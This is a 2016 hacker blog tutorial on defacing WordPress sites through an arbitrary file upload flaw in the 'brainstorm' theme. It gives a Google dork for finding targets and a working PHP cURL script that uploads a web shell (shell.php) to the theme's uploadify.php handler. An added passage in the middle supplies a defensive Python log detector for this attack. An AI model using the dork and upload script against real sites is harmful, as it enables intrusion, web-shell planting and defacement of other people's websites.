Friday, 22 April 2016

Deface Tutorial with WP Themes Brainstorm Arbitrary File


 

Assalamualaikum :v

Back again with me, the handsome Mr.3RR0R

This time I will cover a deface tutorial using "Wordpress themes brainstorm"

I don't know whether this exploit is new or old, I just found it on a neighboring blog :v

OK, let's go straight to the tutorial below

Dork:
inurl:/wp-content/themes/brainstorm

CSRF :

<?php

$uploadfile="shell.php";
$ch = curl_init("www.contoh.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

  print "$postResult";

?> 

First, use the dork above on Google

Once that is done, the vulnerable path is shown below

www.contoh.com/(path)/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php

If the picture looks like this, it is vulnerable :v




If the picture looks like that, all that is left is to use the CSRF above; use xampp :v .
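For administrators of sites running this theme, the requests described above leave a recognisable trail in the web server access log. The following is an added example, not part of the original post: it flags probes of and POSTs to any uploadify.php under wp-content, plus later hits on script files in the same directory. The log lines are constructed, and the assumption that uploads land next to the handler follows the 'folder' value shown in the post.

```python
import re
from posixpath import dirname
from urllib.parse import urlsplit, unquote

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# The upload handler named in the post, matched under any theme or plugin.
UPLOADER_RE = re.compile(r'/wp-content/(?:themes|plugins)/.+/uploadify\.php$', re.I)
SCRIPT_EXT = ('.php', '.phtml', '.php5', '.phar')

def find_uploadify_abuse(lines):
    """Return (kind, time, ip, path) findings; kind is probe, upload or exec."""
    findings, watched = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        path = unquote(urlsplit(m['target']).path)
        ok = int(m['status']) < 400
        if UPLOADER_RE.search(path):
            kind = 'upload' if m['method'] == 'POST' else 'probe'
            if kind == 'upload' and ok:
                watched.add(dirname(path))  # assumed upload destination
            findings.append((kind, m['ts'], m['ip'], path))
        elif ok and dirname(path) in watched and path.lower().endswith(SCRIPT_EXT):
            # A script other than the handler answered from the upload directory.
            findings.append(('exec', m['ts'], m['ip'], path))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up file name).
BASE = '/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'
SAMPLE_LOG = [
    f'203.0.113.7 - - [22/Apr/2016:10:00:01 +0000] "GET {BASE}uploadify.php HTTP/1.1" 200 0 "-" "-"',
    f'203.0.113.7 - - [22/Apr/2016:10:00:09 +0000] "POST {BASE}uploadify.php HTTP/1.1" 200 1 "-" "-"',
    f'203.0.113.7 - - [22/Apr/2016:10:00:15 +0000] "GET {BASE}x.php?a=1 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [22/Apr/2016:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == '__main__':
    for finding in find_uploadify_abuse(SAMPLE_LOG):
        print(*finding)
```

An upload or exec finding is a reason to remove the upload handler from the theme and to review that directory for files that are not part of the theme.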

OK, that's all. If anything is unclear, please leave a comment below :D

Happy Enjoy :D

Wassalamualaikum, folks :v


Source : TKJ Cyber Art

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fan page : https://mobile.facebook.com/Mr3RR0R-1605930586394122/
